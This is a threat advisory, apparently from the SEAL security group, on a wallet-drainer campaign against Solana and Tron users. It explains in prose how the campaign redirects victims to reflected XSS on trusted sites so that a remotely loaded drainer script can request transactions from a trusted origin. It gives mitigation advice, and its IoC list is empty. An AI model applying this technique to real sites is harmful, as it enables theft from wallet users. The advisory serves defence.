SEAL is tracking an ongoing drainer campaign against specifically targeted Solana and Tron users by a threat actor identified as Perpetual Drainer, and is working closely with industry partners to protect end users. Perpetual Drainer has been observed to exploit reflected XSS vulnerabilities in order to social engineer select victims into believing that a legitimate website is requesting a transaction. This both bypasses many traditional mitigations implemented by wallets, but also is more likely to convince a user to approve a transaction.
Methodology
Like most drainers, Perpetual Drainer operates through an affiliate model. This means that the developers of Perpetual Drainer are responsible for developing the drainer software and hosting the back office infrastructure, while the affiliates are responsible for deploying the drainer software and hosting the front office infrastructure. In exchange for receiving the software to deploy, affiliates pay a portion of all stolen proceeds to the developers.
However, what makes Perpetual Drainer unique is how it bypasses security mitigations within wallets. Typically, when a user visits a website hosting a drainer, the wallet will receive a request from the malicious origin (for example, airdrop-contonsocoin.com). However, when a victim visits a website hosting Perpetual Drainer, the wallet will receive a request from a trusted origin (for example, contoso.org).
This is because Perpetual Drainer will redirect victims to a reflected XSS exploit on a trusted origin, which then dynamically loads a script from Perpetual Drainer infrastructure that contains the actual drainer logic. When this code executes, it rewrites the DOM to display a wallet connection prompt and causes all requests to the wallet extension to originate from the trusted origin, rather than the malicious origin.
Mitigation
SEAL is working with industry partners to identify, notify, and display temporary warnings on sites being exploited by Perpetual Drainer. However, we recommend that developers follow best practices to mitigate XSS attacks, including:
We also recommend developers review their access logs for the following Indicators of Compromise (IoCs). The nature of reflected XSS means that the malicious script will likely be visible within the request path or query parameters.
IoCs
Contact
If you are a security researcher interested in additional technical information or relevant samples, please complete this form.
